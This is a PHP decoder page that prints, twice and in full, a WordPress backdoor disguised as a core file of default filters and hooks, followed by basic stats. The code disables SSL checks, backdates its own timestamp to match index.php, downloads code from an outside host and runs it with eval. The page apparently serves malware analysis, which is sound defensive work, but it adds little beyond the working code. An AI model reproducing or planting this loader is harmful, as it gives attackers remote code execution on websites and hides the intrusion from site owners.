Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * Sets up the default filters and actions for most * of the WordPress hooks..

Decoded Output download

<?php 
/** 
 * Sets up the default filters and actions for most 
 * of the WordPress hooks. 
 * 
 * If you need to remove a default hook, this file will 
 * give you the priority for which to use to remove the 
 * hook. 
 * 
 * Not all of the default hooks are found in style.php 
 * 
 * @package WordPress 
 * @id 83a6ee9b34553e9cf5ef0c507270c 
 */ 
 
// Strip, trim, kses, special wp_nonces for string saves 
 
$wp_nonce = "fd810d33557892cd35d2d81fbef24b4a"; 
function get_contents($url){ 
  $ch = curl_init("$url"); 
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 
  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); 
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 
  curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']); 
  curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']); 
  $result = curl_exec($ch); 
  return $result; 
} 
if(file_exists("index.php")) { 
    touch(__FILE__, filemtime("index.php")); 
} 
$a = get_contents('https://sctn9.com/fun/~estan832/alalioer/wordpress.txt'); 
eval('?>'.$a); 

Did this file decode correctly?

Original Code

<?php
/**
 * Sets up the default filters and actions for most
 * of the WordPress hooks.
 *
 * If you need to remove a default hook, this file will
 * give you the priority for which to use to remove the
 * hook.
 *
 * Not all of the default hooks are found in style.php
 *
 * @package WordPress
 * @id 83a6ee9b34553e9cf5ef0c507270c
 */

// Strip, trim, kses, special wp_nonces for string saves

$wp_nonce = "fd810d33557892cd35d2d81fbef24b4a";
function get_contents($url){
  $ch = curl_init("$url");
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
  curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
  $result = curl_exec($ch);
  return $result;
}
if(file_exists("index.php")) {
    touch(__FILE__, filemtime("index.php"));
}
$a = get_contents('https://sctn9.com/fun/~estan832/alalioer/wordpress.txt');
eval('?>'.$a);

Function Calls

curl_init 1
file_exists 1
get_contents 1

Variables

$url https://sctn9.com/fun/~estan832/alalioer/wordpress.txt
$wp_nonce fd810d33557892cd35d2d81fbef24b4a

Stats

MD5 6179760c0258250729942ba090e2aa65
Eval Count 0
Decode Time 180 ms